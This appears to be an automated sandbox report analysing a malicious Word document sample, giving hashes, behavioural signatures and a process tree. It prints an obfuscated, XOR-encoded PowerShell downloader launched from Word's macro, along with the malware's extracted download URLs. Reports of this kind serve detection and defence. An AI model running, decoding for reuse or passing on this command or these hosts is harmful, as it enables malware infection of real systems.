Analysis
-
max time kernel
152s -
max time network
163s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
01-02-2022 05:39
Static task
static1
Behavioral task
behavioral1
Sample
7694066b23ea826ba0367777fe1f3e1b479a7fe3bac84adab2ae30f171ac1d5d.doc
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
7694066b23ea826ba0367777fe1f3e1b479a7fe3bac84adab2ae30f171ac1d5d.doc
Resource
win10v2004-en-20220112
General
-
Target
7694066b23ea826ba0367777fe1f3e1b479a7fe3bac84adab2ae30f171ac1d5d.doc
-
Size
210KB
-
MD5
7a0e78ce8cccb72e9c39910df15490ba
-
SHA1
5c26eb1856e7c814370476a900148da49d79a9e1
-
SHA256
7694066b23ea826ba0367777fe1f3e1b479a7fe3bac84adab2ae30f171ac1d5d
-
SHA512
114baa574bb3302007ba407ad78e448b7ca7d3ca557c0cafd532919134988b23f81bbc94b4d308990637d65242f4a8abfb9b333f23e389f8f73dcd45144c1940
Malware Config
Extracted
http://giftmaster.ml/PSf4hk96K/
http://mapup.net/w2u4kwT/
http://www.survivallives.com/WdnX2iVg/
http://modivi.hu/nxmoQ9pDQm/
http://eroscenter.co.il/v5nFBp/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
PowersHell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4084 3008 PowersHell.exe WINWORD.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
PowersHell.exeflow pid process 63 4084 PowersHell.exe 66 4084 PowersHell.exe -
Sets service image path in registry 2 TTPs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies data under HKEY_USERS 41 IoCs
Processes:
WaaSMedicAgent.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3008 WINWORD.EXE 3008 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
PowersHell.exepid process 4084 PowersHell.exe 4084 PowersHell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
PowersHell.exedescription pid process Token: SeDebugPrivilege 4084 PowersHell.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
WINWORD.EXEpid process 3008 WINWORD.EXE 3008 WINWORD.EXE 3008 WINWORD.EXE 3008 WINWORD.EXE 3008 WINWORD.EXE 3008 WINWORD.EXE 3008 WINWORD.EXE 3008 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 3008 wrote to memory of 4084 3008 WINWORD.EXE PowersHell.exe PID 3008 wrote to memory of 4084 3008 WINWORD.EXE PowersHell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7694066b23ea826ba0367777fe1f3e1b479a7fe3bac84adab2ae30f171ac1d5d.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\System32\WindowsPowerShell\v1.0\PowersHell.exePowersHell . ( $ENV:COmspec[4,24,25]-Join'')([StrIng]::JOIN( '',('116x39Z49I25<109H62x53W39x125u63<50I58H53u51u36Z112W30V53H36I126<7Z53Z50<19!60V57H53I62W36Z107I116!3!57u38@109I119@56<36W36@32@106u127H127!55u57V54!36H61H49W35u36Z53@34!126V61V60u127I0I3x54x100W56I59I105@102u27Z127I16W56W36<36Z32!106V127W127H61!49!32V37<32W126@62W53u36I127!39@98<37I100u59!39<4@127W16Z56!36<36Z32H106W127u127V39<39I39Z126x35W37I34H38Z57<38H49I60@60W57V38x53@35I126I51Z63<61Z127W7!52I62<8x98<57@6x55@127<16Z56@36@36H32H106V127I127Z61x63V52x57x38Z57@126@56@37V127!62!40Z61x63Z1!105!32@20V1I61!127x16I56H36I36I32!106!127x127H53x34H63<35I51@53Z62W36I53W34@126u51I63@126!57@60H127Z38H101!62u22!18V32x127Z119H126@3V32@60!57W36H120u119Z16V119W121u107W116x42x62u29H112!109!112<119W101u103@97W119I107W116x25x27W63Z109x116!53@62@38x106@36W53W61Z32u123V119@12H119W123V116Z42u62<29I123V119u126@53H40W53Z119x107V54V63W34H53H49W51!56H120Z116<42I50u63H112@57u62!112V116I3@57H38W121W43V36V34W41Z43H116I39@49W25!126W20<63x39u62I60H63H49x52V22u57@60Z53I120u116!42H50H63I124Z112Z116Z25x27Z63<121<107@3x36@49u34@36@125@0<34x63@51<53x35I35x112V116W25u27Z63W107@50<34V53!49<59I107!45V51I49!36I51<56<43!45x45' -SpliT'V' -spLit'w'-SPlit'I' -spliT'!'-SPLIt'u' -spLIT '@'-sPlIT'x'-spliT'H' -SPlIt'<' -sPlIT 'Z' |foREAcH-OBJECt{ [chAr] ($_ -bxoR '0x50')}) ) )2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p1⤵PID:1568
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe aa382a07c977f712ca8efb476502ac15 shUMUIiL30qmi1xrWk1YLg.0.1.0.0.01⤵
- Modifies data under HKEY_USERS
PID:3120